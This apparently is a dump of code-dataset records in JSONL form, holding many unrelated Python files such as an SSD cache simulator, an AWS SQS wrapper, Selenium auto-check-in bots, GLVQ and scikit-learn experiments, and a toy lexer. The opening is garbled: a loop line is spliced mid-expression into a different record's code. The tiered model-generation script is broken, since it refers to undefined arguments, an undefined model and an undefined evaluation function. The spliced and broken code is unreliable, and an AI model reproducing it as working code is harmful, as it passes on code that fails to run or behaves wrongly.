1\r\n\t\t# print(readReq, period, watchDict, predictDict)\r\n\t\titems = line.split(' ')\r\n\t\treqtype = int(items[0])\r\n\t\tblock = int(items[2])\r\n\r\n\t\tif reqtype == 1:\r\n\t\t\tcontinue\r\n\r\n\t\treadReq += 1\r\n\t\tif status == \"watch\":\r\n\t\t\tssd.update_cache(block)\r\n\t\t\twatchDict = recordReq(block, watchDict)\r\n\t\telse:\r\n\t\t\tpredictDict = recordReq(block, predictDict)\r\n\r\n\t\tif readReq >= periodSize and status == \"watch\":\r\n\t\t\t# print(\"period increase\", readReq, period)\r\n\t\t\treadReq = 0\r\n\t\t\tperiod += 1\r\n\t\t\tstatus = \"predict\"\r\n\t\telif status == \"predict\" and readReq >= predictSize:\r\n\t\t\t\toutputResult(watchDict, predictDict, ssd, predictSize)\r\n\t\t\t\tif predictSize >= periodSize:\r\n\t\t\t\t\tprint(i, \"************************************\", file=trace)\r\n\t\t\t\t\treadReq = 0\r\n\t\t\t\t\tperiod += 1\r\n\t\t\t\t\tstatus = \"watch\"\r\n\t\t\t\t\twatchDict = {}\r\n\t\t\t\t\tpredictDict = {}\r\n\t\t\t\t\tssd = alg(throt)\r\n\t\t\t\t\tpredictSize = init_predictSize(throt)\r\n\t\t\t\telse:\r\n\t\t\t\t\tpredictSize = 10*predictSize\r\n\r\n\r\n\tfin.close()\r\n\tprint(filename, \"finished\")\r\n\r\ndef recordReq(block, blockDict):\r\n\tif block in blockDict:\r\n\t\tblockDict[block] += 1\r\n\telse:\r\n\t\tblockDict[block] = 1\r\n\treturn blockDict\r\n\r\n\r\n\r\n\r\n\r\ndef outputResult(watchDict, predictDict, ssd, period):\r\n\tssdBlocks = list(ssd.get_top_n(len(ssd)))\r\n\t# print(ssdBlocks, file=trace)\r\n\t# print(\"watchdict\", watchDict)\r\n\t# print(\"predictdict\", predictDict)\r\n\treq = 0\r\n\tnum = 0\r\n\tfor block in ssdBlocks:\r\n\t\tif block in predictDict:\r\n\t\t\treq += predictDict[block]\r\n\t\t\t\r\n\r\n\r\n\tl = list(predictDict.items()) \r\n\tl.sort(key=operator.itemgetter(1), reverse=True)\r\n\ti = 0\r\n\tj = 0\r\n\treqIdeal = 0\r\n\r\n\twhile i%s\" % (items[x]['url'], items[x]['title'])\n\n return items\n","sub_path":"bika/lims/browser/client/views/srtemplates.py","file_name":"srtemplates.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"340343088","text":"import re\n\nptr = \"¥.(csv|html|py)$\"\nstr = [\"Sample.csv\",\"Sample.exe\",\"test.py\",\"index.html\"]\n\npattern = re.compile(ptr)\nfor valuestr in str:\n\tres = pattern.sub(\".txt\",valuestr)\n\tmrs = \"(変換前)\" + valuestr + \"(変換後)\" + res\n\tprint(mrs)","sub_path":"Python/Python Lesson/Second/Lesson9/Sample12.py","file_name":"Sample12.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"645549477","text":"import os\nimport boto3\nfrom threading import Lock\n\n\nclass Sqs():\n __instance = None\n\n def __init__(self, **options):\n self.lock = Lock()\n aws_access_key_id = os.environ['AWS_ACCESS_KEY_ID'] if 'AWS_ACCESS_KEY_ID' in os.environ.keys() else options.get(\n 'aws_access_key_id', '')\n aws_secret_access_key = os.environ['AWS_SECRET_ACCESS_KEY'] if 'AWS_SECRET_ACCESS_KEY' in os.environ.keys() else options.get(\n 'aws_secret_access_key', '')\n region_name = os.environ['AWS_REGION_NAME'] if 'AWS_REGION_NAME' in os.environ.keys() else options.get(\n 'region_name', '')\n endpoint_url = os.environ['SQS_URL'] if 'SQS_URL' in os.environ.keys() else options.get(\n 'endpoint_url', '')\n self.sqs = boto3.resource('sqs',\n aws_access_key_id=aws_access_key_id,\n aws_secret_access_key=aws_secret_access_key,\n region_name=region_name,\n endpoint_url=endpoint_url,\n )\n\n def create_queue(self, queue_name):\n return self.sqs.create_queue(\n QueueName=queue_name\n )\n\n def fetch_queue(self, queue_name):\n return self.sqs.get_queue_by_name(QueueName=queue_name)\n\n def send_message(self, queue_name, messages):\n request = messages if isinstance(messages, list) else [messages]\n queue = self.fetch_queue(queue_name)\n return queue.send_messages(Entries=(request))\n\n def receive_message(self, queue_name):\n queue = self.fetch_queue(queue_name)\n with self.lock:\n r = queue.receive_messages(MaxNumberOfMessages=1)\n if len(r) == 0:\n return None\n else:\n message = r[0]\n body = message.body\n message.delete()\n return body\n","sub_path":"queue_for_thread/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"593810913","text":"import os\n# 方便延时加载\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n# 模拟浏览器打开网站\nchrome_options = Options()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--disable-dev-shm-usage')\nbrowser = webdriver.Chrome('/usr/bin/chromedriver', chrome_options=chrome_options)\n#window电脑本地\n# browser = webdriver.Chrome(\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver\")\n\n# IamOK自动签到\ndef scut():\n browser.get('https://sso.scut.edu.cn/cas/login?service=https%3A%2F%2Fiamok.scut.edu.cn%2Fcas%2Flogin')\n # 将窗口最大化\n browser.maximize_window()\n # 格式是PEP8自动转的\n # 这里是找到输入框,发送要输入的用户名和密码,模拟登陆\n browser.find_element_by_xpath(\n \"//*[@id='un']\").send_keys(os.environ['SCUT_USER'])\n browser.find_element_by_xpath(\n \"//*[@id='pd']\").send_keys(os.environ['SCUT_PASSWORD'])\n # 在输入用户名和密码之后,点击登陆按钮\n browser.find_element_by_xpath(\"//*[@id='index_login_btn']\").click()\n time.sleep(10)\n try:\n browser.find_element_by_xpath(\"//*[@id='app']/div/div/div[2]/div[3]/button\").click()\n print(\"IamOK签到成功\")\n time.sleep(3)\n saveFile(\"IamOK签到成功!\\n\")\n except NoSuchElementException as e:\n print (\"NoSuchElementException!\")\n # js = 'document.getElementById(\"btn\").click();'\n # browser.execute_script(js)\n saveFile(\"IamOK签到代码存在异常\"+str(e))\n\n\n\n# 司徒云自动签到脚本\ndef situyun():\n browser.get('http://situcloud.xyz/auth/login')\n # 将窗口最大化\n browser.maximize_window()\n # 格式是PEP8自动转的\n # 这里是找到输入框,发送要输入的用户名和密码,模拟登陆\n browser.find_element_by_xpath(\n \"//*[@id='email']\").send_keys(os.environ['SITUYUN_USER'])\n browser.find_element_by_xpath(\n \"//*[@id='password']\").send_keys(os.environ['SITUYUN_PASSWORD'])\n # 在输入用户名和密码之后,点击登陆按钮\n browser.find_element_by_xpath(\"//*[@id='app']/section/div/div/div/div[2]/form/div/div[5]/button\").click()\n time.sleep(10)\n try:\n if(\"明日再来\" in browser.find_element_by_xpath(\"//*[@id='checkin-div']\").text):\n saveFile(\"明日再来!\")\n else:\n # browser.find_element_by_xpath(\"//*[@id='checkin-div']/a\").send_keys(Keys.ENTER)\n js = 'document.getElementById(\"checkin-div\").children[0].click();'\n browser.execute_script(js)\n print(\"司徒云打卡成功\")\n time.sleep(3)\n saveFile(\"司徒云签到成功!\")\n except NoSuchElementException as e:\n print (\"NoSuchElementException!\")\n saveFile(\"司徒云签到代码存在异常\"+str(e))\n\n# n3ro自动签到脚本 \ndef n3ro():\n browser.get('https://n3ro.wtf/auth/login')\n # 将窗口最大化\n browser.maximize_window()\n # 格式是PEP8自动转的\n # 这里是找到输入框,发送要输入的用户名和密码,模拟登陆\n browser.find_element_by_xpath(\n \"//*[@id='email']\").send_keys(os.environ['N3RO_USER'])\n browser.find_element_by_xpath(\n \"//*[@id='passwd']\").send_keys(os.environ['N3RO_PASSWORD'])\n # 在输入用户名和密码之后,点击登陆按钮\n browser.find_element_by_xpath(\"//*[@id='login']\").click()\n time.sleep(10)\n try:\n if(\"您今日已签到\" in browser.find_element_by_xpath(\"//*[@class='btn btn-outline-default disabled']\").text):\n saveFile(\"n3ro今日已签到!\\n\")\n else: \n js = 'document.getElementById(\"checkin\").click();'\n browser.execute_script(js)\n print(\"n3ro签到成功\")\n saveFile(\"n3ro签到成功!\\n\")\n time.sleep(3) \n except NoSuchElementException as e:\n print (\"NoSuchElementException!\")\n saveFile(\"n3ro签到代码存在异常\"+str(e)) \n\n# Jikess自动签到脚本\ndef jikess():\n browser.get('https://jikess.com/user/login.php')\n # 将窗口最大化\n browser.maximize_window()\n # 格式是PEP8自动转的\n # 这里是找到输入框,发送要输入的用户名和密码,模拟登陆\n browser.find_element_by_xpath(\n \"//*[@id='email']\").send_keys(os.environ['JIKESS_USER'])\n browser.find_element_by_xpath(\n \"//*[@id='passwd']\").send_keys(os.environ['JIKESS_PASSWORD'])\n # 在输入用户名和密码之后,点击登陆按钮\n browser.find_element_by_xpath(\"//*[@id='login']\").click()\n time.sleep(10)\n try:\n \n if(\"不能签到\" in browser.find_element_by_xpath(\"//*[@class='skin-blue']\").text):\n saveFile(\"Jikess今日已签到!\\n\")\n else: \n js = 'document.getElementById(\"checkin\").click();'\n browser.execute_script(js)\n print(\"Jikess签到成功\")\n saveFile(\"Jikess签到成功!\")\n time.sleep(3) \n except NoSuchElementException as e:\n print (\"NoSuchElementException!\")\n saveFile(\"Jikess签到代码存在异常\"+str(e)) \n\n# Jikess自动签到脚本\ndef jikess2():\n browser.get('https://jikess.com/user/login.php')\n # 将窗口最大化\n browser.maximize_window()\n # 格式是PEP8自动转的\n # 这里是找到输入框,发送要输入的用户名和密码,模拟登陆\n browser.find_element_by_xpath(\n \"//*[@id='email']\").send_keys(os.environ['JIKESS_USER2'])\n browser.find_element_by_xpath(\n \"//*[@id='passwd']\").send_keys(os.environ['JIKESS_PASSWORD2'])\n # 在输入用户名和密码之后,点击登陆按钮\n browser.find_element_by_xpath(\"//*[@id='login']\").click()\n time.sleep(10)\n try:\n \n if(\"不能签到\" in browser.find_element_by_xpath(\"//*[@class='skin-blue']\").text):\n saveFile(\"Jikess2今日已签到!\\n\")\n else: \n js = 'document.getElementById(\"checkin\").click();'\n browser.execute_script(js)\n print(\"Jikess2签到成功\")\n saveFile(\"Jikess2签到成功!\")\n time.sleep(3) \n except NoSuchElementException as e:\n print (\"NoSuchElementException!\")\n saveFile(\"Jikess2签到代码存在异常\"+str(e)) \n\n# 写邮件\ndef saveFile(message):\n # 保存email内容\n with open(\"email.txt\", 'a+', encoding=\"utf-8\") as email:\n email.write(message+'\\n')\n \nif __name__ == '__main__':\n #scut()\n \n #jikess()\n jikess2()\n #n3ro()\n # 脚本运行成功,退出浏览器\n browser.quit()\n","sub_path":"autoclick.py","file_name":"autoclick.py","file_ext":"py","file_size_in_byte":6641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"628576268","text":"import numpy as np\nfrom sklearn.svm import LinearSVC, SVC, NuSVC, SVR, LinearSVR, NuSVR\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import tree\nfrom argparse import ArgumentParser\nfrom pydotplus import graph_from_dot_data\nfrom random import shuffle\nfrom sklearn.model_selection import KFold\n\nx = ArgumentParser(description='Generate Models using Tiered Generation Approach')\nx.add_argument('--model-type', dest='type', action='store', choices=['linear', 'svc', 'nu', 'svr', 'linearsvr', 'nusvr', 'knn', 'tree'],\n help='model generation type to use')\nx.add_argument('--build-mode', dest='iterative', action='store_true', help='automatically choose the best axes configuration', default=False)\nargs = x.parse_args()\n\n\n#\n# Constants\n#\nPERCENT_TRAIN_DIVIDE = 0.8\nEVAL_ROUNDS = int(args.rounds)\nNUM_AXES = -1 if args.iterative else int(args.axes)\nGRAPH_MEASURES = ['v', 'matches', 'seed_1', 'seed_2', 'tr', 'ts', 'place', \"class\"]\n\nintro = '''\nPerforming Tiered Model Generation and Evaluation on Existing Data Set with Params:\n\\tevaluation rounds: {}\n\\tModel Type: {}\n\\tNumber of Axes: {}\n\n'''.format(EVAL_ROUNDS, args.type, NUM_AXES)\n\nprint(intro)\n\ndef generate_models(n_axes, models={}, graph_configs=[]):\n for grph in graph_configs:\n model_candidate = None\n if args.type == 'linear':\n model_candidate = LinearSVC()\n elif args.type == 'svc':\n model_candidate = SVC()\n elif args.type == 'nu':\n model_candidate = NuSVC()\n elif args.type == 'svr':\n model_candidate = SVR()\n elif args.type == 'linearsvr':\n model_candidate = LinearSVR()\n elif args.type == 'nusvr':\n model_candidate = NuSVR()\n elif args.type == 'knn':\n model_candidate = KNeighborsClassifier()\n elif args.type == 'tree':\n model_candidate = DecisionTreeClassifier(criterion='entropy', max_features='auto')\n\n models[grph['label']] = model_candidate\n\n Training_Data = []\n Training_labels = []\n for i in range(0, len(grph[chr(1) + '-data'])):\n for j in range(0, len(grph[chr(1) + '-data'][i])):\n point = []\n for x in range(1, n_axes + 1):\n point.append(grph[chr(x) + '-data'][i][j])\n Training_Data.append(point)\n Training_labels.append(i)\n Training_Data = np.array(Training_Data)\n Training_labels = np.array(Training_labels)\n\n model_candidate.fit(Training_Data, Training_labels)\n\n return models\n\n\ndef get_data():\n data = None\n with open('../data/joined/MF.tredux.joined.web.json', 'r', encoding='utf8') as r:\n from json import loads\n data = loads(r.read())\n\n with open('labels_filled', 'r') as r:\n for line in r:\n name, label = line.strip().split('|')\n for tournament in data:\n for particp_k in tournament:\n if name in tournament[particp_k]:\n tournament[particp_k][name]['label'] = label\n names = set()\n\n master_data = []\n\n for tournament in data:\n for particp in tournament.values():\n names |= particp.keys()\n for k in particp:\n entries = {k: v if v is not None else -1 for k, v in particp[k].items() if k in GRAPH_MEASURES + ['label']}\n verification_entry = entries.copy()\n verification_entry['true_label'] = particp[k]['label']\n if particp[k]['label'] == '3':\n master_data.append(entries)\n elif particp[k]['label'] == '2':\n master_data.append(entries)\n elif particp[k]['label'] == '1':\n master_data.append(entries)\n else:\n master_data.append(entries)\n\n return master_data\n\n\nif __name__ == '__main__':\n kf = KFold(n_splits=5, shuffle=True)\n master_data = get_data()\n master_data = np.array(master_data)\n for train_index, test_index in kf.split(master_data):\n pass\n\n\n if args.type == 'tree':\n dd = tree.export_graphviz(model,\n out_file=None,\n feature_names=model['label'].split('|'),\n proportion=True,\n leaves_parallel=False,\n class_names=['local champion', 'national champion', 'international champion', 'olympic representative'],\n filled=True)\n graph = graph_from_dot_data(dd)\n graph.write_pdf('tree_visualization.pdf')\n\n test_and_evaluate(model)","sub_path":"anaylsis/v1/tiered_modelgen.py","file_name":"tiered_modelgen.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"95480442","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSe encarga de definir las clases para el manejo de archivos\n\"\"\"\n\nimport datetime\nimport os\n\nclass Archivo:\n def __init__(self, ruta):\n \"\"\" Constructor de la clase Archivo \"\"\"\n self.ruta = ruta\n self.peso = os.path.getsize(ruta)\n ts = os.path.getmtime(ruta)\n self.fecha = datetime.datetime.fromtimestamp(ts) # fecha de tipo datetime\n\n def dict(self):\n \"\"\" Regresa la versión en diccionario de un objeto Archivo \"\"\"\n return {\n \"nombre\":self.ruta,\n \"peso\": self.peso,\n \"fecha\": self.fecha.isoformat()\n }\n\n def list(self):\n \"\"\" Regresa la versión en lista de un objeto Archivo \"\"\"\n return [self.ruta, self.peso, self.fecha]\n\n\nclass Carpeta:\n def __init__(self, ruta):\n \"\"\" Constructor de la clase Carpeta \"\"\"\n self.ruta = ruta\n self.peso = 0 # El total de bytes ocupado por lo elementos de la carpeta\n ts = os.path.getmtime(ruta)\n self.fecha = datetime.datetime.fromtimestamp(ts) # fecha de tipo datetime\n\n def obtener_archivos(self, ordenar=\"\"):\n \"\"\"\n Obtiene la lista de archivos de la carpeta\n \"\"\"\n elementos = os.listdir(self.ruta) # Obtiene la lista de nombres de archivos\n if ordenar == \"nombre\":\n elementos.sort()\n elementos = [os.path.join(self.ruta, a) for a in elementos] # Se agrega la ruta\n\n lista_elementos = []\n for elemento in elementos:\n if os.path.isdir(elemento):\n carpeta = Carpeta(elemento)\n self.peso += carpeta.peso # Acumulando los pesos\n lista_elementos.append(carpeta)\n lista_elementos += carpeta.obtener_archivos() # Recursión a nivel objetos\n else:\n archivo = Archivo(elemento)\n # self.peso = self.peso + archivo.peso\n self.peso += archivo.peso # Acumulando los pesos \n lista_elementos.append(archivo)\n\n return lista_elementos # Regresa una lista de objetos Archivo\n\n def dict(self):\n \"\"\" Regresa la versión en diccionario de un objeto Archivo \"\"\"\n return {\n \"nombre\":self.ruta,\n \"peso\": self.peso,\n \"fecha\": self.fecha.isoformat()\n }\n\n def list(self):\n \"\"\" Regresa la versión en lista de un objeto Archivo \"\"\"\n return [self.ruta, self.peso, self.fecha]\n\n\n\n","sub_path":"Sesion-07/Ejemplo-02/modelo.py","file_name":"modelo.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"498677706","text":"def dictionary_generator(input_list, pad_flag=True, eos_flag=True, oov_flag=True):\n index_flag = 0\n result_dict = dict()\n if pad_flag is True:\n result_dict['P***A***D'] = index_flag\n index_flag += 1\n if eos_flag is True:\n result_dict['E***O***S'] = index_flag\n index_flag += 1\n if oov_flag is True:\n result_dict['O***O***V'] = index_flag\n index_flag += 1\n\n for one_entry in input_list:\n result_dict[one_entry] = index_flag\n index_flag += 1\n inverse_result_dict = {v: k for k, v in result_dict.items()}\n return result_dict, inverse_result_dict\n\n\ndef data_indexer(input_list, indexing_dict):\n result_list = list()\n for one_entry in input_list:\n if one_entry in indexing_dict:\n result_list.append(indexing_dict[one_entry])\n else:\n result_list.append(indexing_dict['O***O***V'])\n return result_list","sub_path":"model/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"75298210","text":"import pytest\n\nfrom ereuse_devicehub.client import UserClient\nfrom ereuse_devicehub.db import db\nfrom ereuse_devicehub.devicehub import Devicehub\nfrom ereuse_devicehub.resources.device.models import Desktop, Device, Laptop, Microtower, \\\n SolidStateDrive\nfrom ereuse_devicehub.resources.inventory import Filters, Inventory, Sorting\nfrom teal.utils import compiled\n\n\n@pytest.mark.usefixtures('app_context')\ndef test_inventory_filters():\n schema = Filters()\n q = schema.load({\n 'type': ['Computer', 'Laptop'],\n 'manufacturer': 'Dell',\n 'rating': {\n 'rating': [3, 6],\n 'appearance': [2, 4]\n },\n 'tag': {\n 'id': ['bcn-', 'activa-02']\n }\n })\n s, params = compiled(Device, q)\n # Order between query clauses can change\n assert '(device.type IN (%(type_1)s, %(type_2)s, %(type_3)s, %(type_4)s, ' \\\n '%(type_5)s, %(type_6)s) OR device.type IN (%(type_7)s))' in s\n assert 'device.manufacturer ILIKE %(manufacturer_1)s' in s\n assert 'rate.rating BETWEEN %(rating_1)s AND %(rating_2)s' in s\n assert 'rate.appearance BETWEEN %(appearance_1)s AND %(appearance_2)s' in s\n assert '(tag.id ILIKE %(id_1)s OR tag.id ILIKE %(id_2)s)' in s\n\n # type_x can be assigned at different values\n # ex: type_1 can be 'Desktop' in one execution but the next one 'Laptop'\n assert set(params.keys()) == {\n 'id_1',\n 'manufacturer_1',\n 'type_4',\n 'type_3',\n 'id_2',\n 'type_1',\n 'rating_1',\n 'type_5',\n 'appearance_2',\n 'type_6',\n 'type_7',\n 'appearance_1',\n 'rating_2',\n 'type_2'\n }\n assert set(params.values()) == {\n 'bcn-%',\n 'Dell%',\n 'Laptop',\n 'Server',\n 'activa-02%',\n 'Computer',\n 3.0,\n 'Microtower',\n 4.0,\n 'Netbook',\n 'Laptop',\n 2.0,\n 6.0,\n 'Desktop'\n }\n\n\n@pytest.mark.usefixtures('app_context')\ndef test_inventory_sort():\n schema = Sorting()\n r = next(schema.load({'created': True}))\n assert str(r) == 'device.created ASC'\n\n\n@pytest.fixture()\ndef inventory_query_dummy(app: Devicehub):\n with app.app_context():\n db.session.add_all(( # The order matters ;-)\n Desktop(serial_number='s1', model='ml1', manufacturer='mr1'),\n Laptop(serial_number='s3', model='ml3', manufacturer='mr3'),\n Microtower(serial_number='s2', model='ml2', manufacturer='mr2'),\n SolidStateDrive(serial_number='s4', model='ml4', manufacturer='mr4')\n ))\n db.session.commit()\n\n\n@pytest.mark.usefixtures('inventory_query_dummy')\ndef test_inventory_query_no_filters(user: UserClient):\n i, _ = user.get(res=Inventory)\n assert tuple(d['type'] for d in i['devices']) == (\n 'SolidStateDrive', 'Microtower', 'Laptop', 'Desktop'\n )\n\n\n@pytest.mark.usefixtures('inventory_query_dummy')\ndef test_inventory_query_filter_type(user: UserClient):\n i, _ = user.get(res=Inventory, query=[('filter', {'type': ['Computer', 'Microtower']})])\n assert tuple(d['type'] for d in i['devices']) == ('Microtower', 'Laptop', 'Desktop')\n\n\n@pytest.mark.usefixtures('inventory_query_dummy')\ndef test_inventory_query_filter_sort(user: UserClient):\n i, _ = user.get(res=Inventory, query=[\n ('sort', {'created': Sorting.ASCENDING}),\n ('filter', {'type': ['Computer']})\n ])\n assert tuple(d['type'] for d in i['devices']) == ('Desktop', 'Laptop', 'Microtower')\n","sub_path":"tests/test_inventory.py","file_name":"test_inventory.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"609156577","text":"import copy\nimport random\nfrom typing import List, Dict\n\n\ndef add_pad_unk(embeddings: Dict, pad_token: str, unk_token: str):\n\n embedding_size = len(next(iter(embeddings.values())))\n\n # pad token\n if pad_token not in embeddings:\n embeddings[pad_token] = (\n [random.gauss(0, 1) for _ in range(embedding_size)])\n\n # unk token\n if unk_token not in embeddings:\n embeddings[unk_token] = (\n [random.gauss(0, 1) for _ in range(embedding_size)])\n\n\ndef filter_unused_word(embeddings: Dict, sentences: List[List[str]]):\n\n # used words\n used_words = set()\n for s in sentences:\n used_words.update(s)\n\n # build word_lookup and word_embedding\n word_lookup = []\n word_embedding = []\n\n for w in used_words:\n word_lookup.append(w)\n word_embedding.append(embeddings[w])\n\n return word_lookup, word_embedding\n\n\ndef _cut_and_pad(s: List[str], max_length: int, pad_token: str):\n\n s_len = len(s)\n\n if s_len < max_length:\n new_s = s + [pad_token] * (max_length - s_len)\n elif s_len > max_length:\n new_s = s[0: max_length]\n else:\n new_s = s\n\n return new_s\n\n\ndef _low_case(s: List[str]):\n\n cases = []\n lowed = []\n\n for token in s:\n if token.isalpha():\n if token.isupper():\n cases.append(0) # upper: 0\n elif token.istitle():\n cases.append(1) # title: 1\n elif token.islower():\n cases.append(2) # lower: 2\n else:\n cases.append(3) # hybird: 3\n else:\n cases.append(3) # hybird\n\n lowed.append(token.lower())\n\n return lowed, cases\n\n\ndef _replace_oov(s: List[str], embeddings: Dict, unk_token: str):\n\n new_s = []\n\n for token in s:\n if token in embeddings:\n new_s.append(token)\n else:\n new_s.append(unk_token)\n\n return new_s\n\n\ndef adjust_sentence(sentences: List[List[str]],\n max_length: int, pad_token: str,\n embeddings: Dict, unk_token: str):\n\n new_sentences = []\n case_seqs = []\n\n for s in sentences:\n\n # cut and pad\n cutted = _cut_and_pad(s, max_length, pad_token)\n\n # low case\n lowed, case_seq = _low_case(cutted)\n\n # replace_oov\n new_s = _replace_oov(lowed, embeddings, unk_token)\n\n # append to new_sentences\n new_sentences.append(new_s)\n case_seqs.append(case_seq)\n\n return new_sentences, case_seqs\n","sub_path":"etype-uncased-nomc/adjust/sentence.py","file_name":"sentence.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"592415681","text":"\"\"\"ProtoTorch GLVQ example using 2D Iris data.\"\"\"\n\nimport numpy as np\nimport torch\nfrom matplotlib import pyplot as plt\nfrom prototorch.functions.competitions import wtac\nfrom prototorch.functions.distances import euclidean_distance\nfrom prototorch.modules.losses import GLVQLoss\nfrom prototorch.modules.prototypes import Prototypes1D\nfrom sklearn.datasets import load_iris\nfrom sklearn.preprocessing import StandardScaler\nfrom torchinfo import summary\n\n# Prepare and preprocess the data\nscaler = StandardScaler()\nx_train, y_train = load_iris(return_X_y=True)\nx_train = x_train[:, [0, 2]]\nscaler.fit(x_train)\nx_train = scaler.transform(x_train)\n\n\n# Define the GLVQ model\nclass Model(torch.nn.Module):\n def __init__(self):\n \"\"\"GLVQ model for training on 2D Iris data.\"\"\"\n super().__init__()\n self.proto_layer = Prototypes1D(\n input_dim=2,\n prototypes_per_class=3,\n nclasses=3,\n prototype_initializer=\"stratified_random\",\n data=[x_train, y_train])\n\n def forward(self, x):\n protos = self.proto_layer.prototypes\n plabels = self.proto_layer.prototype_labels\n dis = euclidean_distance(x, protos)\n return dis, plabels\n\n\n# Build the GLVQ model\nmodel = Model()\n\n# Print summary using torchinfo (might be buggy/incorrect)\nprint(summary(model))\n\n# Optimize using SGD optimizer from `torch.optim`\noptimizer = torch.optim.SGD(model.parameters(), lr=0.01)\ncriterion = GLVQLoss(squashing=\"sigmoid_beta\", beta=10)\n\nx_in = torch.Tensor(x_train)\ny_in = torch.Tensor(y_train)\n\n# Training loop\ntitle = \"Prototype Visualization\"\nfig = plt.figure(title)\nfor epoch in range(70):\n # Compute loss\n dis, plabels = model(x_in)\n loss = criterion([dis, plabels], y_in)\n with torch.no_grad():\n pred = wtac(dis, plabels)\n correct = pred.eq(y_in.view_as(pred)).sum().item()\n acc = 100. * correct / len(x_train)\n print(f\"Epoch: {epoch + 1:03d} Loss: {loss.item():05.02f} Acc: {acc:05.02f}%\")\n\n # Take a gradient descent step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # Get the prototypes form the model\n protos = model.proto_layer.prototypes.data.numpy()\n if np.isnan(np.sum(protos)):\n print(\"Stopping training because of `nan` in prototypes.\")\n break\n\n # Visualize the data and the prototypes\n ax = fig.gca()\n ax.cla()\n ax.set_title(title)\n ax.set_xlabel(\"Data dimension 1\")\n ax.set_ylabel(\"Data dimension 2\")\n cmap = \"viridis\"\n ax.scatter(x_train[:, 0], x_train[:, 1], c=y_train, edgecolor=\"k\")\n ax.scatter(protos[:, 0],\n protos[:, 1],\n c=plabels,\n cmap=cmap,\n edgecolor=\"k\",\n marker=\"D\",\n s=50)\n\n # Paint decision regions\n x = np.vstack((x_train, protos))\n x_min, x_max = x[:, 0].min() - 1, x[:, 0].max() + 1\n y_min, y_max = x[:, 1].min() - 1, x[:, 1].max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, 1 / 50),\n np.arange(y_min, y_max, 1 / 50))\n mesh_input = np.c_[xx.ravel(), yy.ravel()]\n\n torch_input = torch.Tensor(mesh_input)\n d = model(torch_input)[0]\n w_indices = torch.argmin(d, dim=1)\n y_pred = torch.index_select(plabels, 0, w_indices)\n y_pred = y_pred.reshape(xx.shape)\n\n # Plot voronoi regions\n ax.contourf(xx, yy, y_pred, cmap=cmap, alpha=0.35)\n\n ax.set_xlim(left=x_min + 0, right=x_max - 0)\n ax.set_ylim(bottom=y_min + 0, top=y_max - 0)\n\n plt.pause(0.1)\n","sub_path":"examples/glvq_iris.py","file_name":"glvq_iris.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"593785571","text":"import sys\nimport re\nfrom enum import Enum\n\nre.ASCII\n\n\nclass MplSyntaxError(Exception):\n pass\n\n\nclass Tokens(Enum):\n KEYWORD = 1\n SEPARATOR = 2\n LITERAL = 3\n IDENTIFIER = 4\n OPERATOR = 5\n INDENTATION = 6\n\n\nkeywords = ['int', 'float', 'double', 'array', 'bool', 'return', 'class']\nseparators = ['{', '}', '<', '>', ',']\noperators = ['=']\nliterals = r'^([0-9]+|\".*\")$'\nidentifiers = r'^(\\w+)$'\n\n\nsymbol_table = []\n\ndef process_word(word):\n if word in keywords:\n return (Tokens.KEYWORD, word)\n if word in separators:\n return (Tokens.SEPARATOR, word)\n if word in operators:\n return (Tokens.OPERATOR, word)\n\n m = re.match(literals, word)\n if m:\n return (Tokens.LITERAL, m.group(1))\n m = re.match(identifiers, word)\n if m:\n return (Tokens.IDENTIFIER, m.group(1))\n\n return None\n\n\ndef process_sub_word(word, index):\n valid_tokens = []\n subword = ''\n for i in range(index, len(word)):\n subword += word[i]\n token = process_word(subword)\n if token:\n valid_tokens.append((i, token))\n\n return valid_tokens\n\n\ndef process_leading_spaces(line, index):\n space_count = len(line) - len(line.lstrip())\n if space_count % 4 != 0:\n raise MplSyntaxError('Invalid space count {} on line {}:\\n{}'\n .format(space_count, index, line))\n indent_count = space_count / 4\n return indent_count\n\n\ndef process_line(line, line_index):\n if len(line.strip()) == 0:\n return\n\n indent_count = process_leading_spaces(line, line_index)\n if indent_count > 0:\n symbol_table.append((Tokens.INDENTATION, indent_count))\n words = line.split()\n for word in words:\n token = process_word(word)\n if token:\n symbol_table.append(token)\n else:\n index = 0\n while index < len(word):\n tokens = process_sub_word(word, index)\n if tokens:\n index, token = tokens[-1]\n index += 1\n symbol_table.append(token)\n else:\n break\n\n\nif __name__ == '__main__':\n mpl_file = sys.argv[1]\n with open(mpl_file, 'r') as f:\n for line_index, line in enumerate(f.readlines()):\n process_line(line, line_index)\n\n for symbol in symbol_table:\n 